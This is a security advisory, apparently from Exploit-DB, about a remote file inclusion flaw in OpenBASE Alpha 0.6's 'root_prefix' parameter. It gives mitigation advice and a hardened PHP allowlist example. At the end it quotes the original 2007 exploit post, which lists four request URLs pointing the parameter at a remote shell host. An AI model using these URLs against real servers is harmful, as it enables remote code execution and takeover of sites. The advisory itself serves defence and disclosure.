Vendor: OpenBASE Alpha
By: DeltahackingTEAM
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: OpenBASE Alpha
Patch Exists: NO
Date: 2007

OpenBASE Alpha 0.6 Remote File Inclusion

The OpenBASE Alpha 0.6 portal is vulnerable to remote file inclusion. Several PHP files build an include path from the 'root_prefix' parameter without validating it, so an attacker who supplies a URL in that parameter can make the server fetch and execute PHP code from a remote host of their choosing.

Mitigation:

To mitigate this vulnerability, the developer should not derive include paths from user-controlled input at all; where a request parameter must select a file, it should be validated against a fixed allowlist of known filenames before it is used in an include.
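The following is an added example of the hardened pattern described above; it is not OpenBASE's own code. It assumes the vulnerable line `require_once($root_prefix . "nav.php")` was reachable because `$root_prefix` could be set from the request (the advisory does not say how, so that is an assumption), and it uses a hypothetical `page` parameter, a hypothetical helper `resolve_page()` and constructed filenames (`news.php`, `about.php`) to show the allowlist approach.

```php
<?php
// Added example (not OpenBASE's own code): hardened replacement for
// `require_once($root_prefix . "nav.php")`, where $root_prefix was
// assumed to be request-controlled.

// 1. Anchor every include to the script's own directory. __DIR__ is set by
//    the interpreter and cannot be influenced by request data, so no URL or
//    "../" sequence can ever reach this include.
define('APP_ROOT', __DIR__ . DIRECTORY_SEPARATOR);
require_once APP_ROOT . 'nav.php';

// 2. When a request parameter must choose a file, map it through an
//    allowlist of known names instead of concatenating it into a path.
//    resolve_page() is a hypothetical helper written for this example.
function resolve_page(string $requested, array $allowed): string
{
    // Only keys that exist in the allowlist are accepted; the request value
    // itself never becomes part of the path.
    if (!array_key_exists($requested, $allowed)) {
        throw new InvalidArgumentException('unknown page');
    }
    $path = APP_ROOT . $allowed[$requested];

    // realpath() resolves symlinks and "..", and returns false for remote
    // wrappers or missing files. Confirm the result still lies under APP_ROOT.
    $real = realpath($path);
    if ($real === false || strncmp($real, APP_ROOT, strlen(APP_ROOT)) !== 0) {
        throw new RuntimeException('include outside application root');
    }
    return $real;
}

// Constructed allowlist for the example; keys are what the client may send,
// values are the only files that can ever be included.
$pages = [
    'news'  => 'news.php',
    'about' => 'about.php',
];

$page = isset($_GET['page']) ? (string) $_GET['page'] : 'news';
require_once resolve_page($page, $pages);
```

Code-level validation is the primary fix, but the server configuration should also deny the attack class outright: `allow_url_include = Off` in php.ini (the default since PHP 5.2) prevents `require`/`include` from fetching remote URLs regardless of application bugs, and `register_globals = Off` (removed entirely in PHP 5.4) stops request parameters from silently populating uninitialised variables such as `$root_prefix`.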

Exploit-DB raw data:

**********************************************************************************************************
                                              DeltaSecurityTEAM
                                              WwW.DeltaSecurity.iR
**********************************************************************************************************
* Portal Name = OpenBASE Alpha 0.6
* Class = Remote File Inclusion
* Risk = High (Remote File Execution)
* Download = Http://openbase.sourceforge.net
* Discovered By = DeltahackingTEAM
* User In Delta Team = Dav00d_Cracker
* Contact = Davood_cracker@Yahoo.com
--------------------------------------------------------------------------------------------
Vulnerability C0de :
Require_once($root_prefix . "nav.php");
--------------------------------------------------------------------------------------------
- Expl0it:
Http://localhost/[PATH]/index.php?root_prefix=http://Shellz?
Http://localhost/[PATH]/email_subscribe.php?root_prefix=http://Shellz?
Http://localhost/[PATH]/download.php?root_prefix=http://Shellz?
Http://localhost/[PATH]/development.php?root_prefix=http://Shellz?
--------------------------------------------------------------------------------------------
Gr33tz : Dr.Trojan , Hiv++ , D_7j , L0rd , RezaYavari , Vpc , all IRANIAN Hackers , and all Enemy
**********************************************************************************************************

# milw0rm.com [2007-05-25]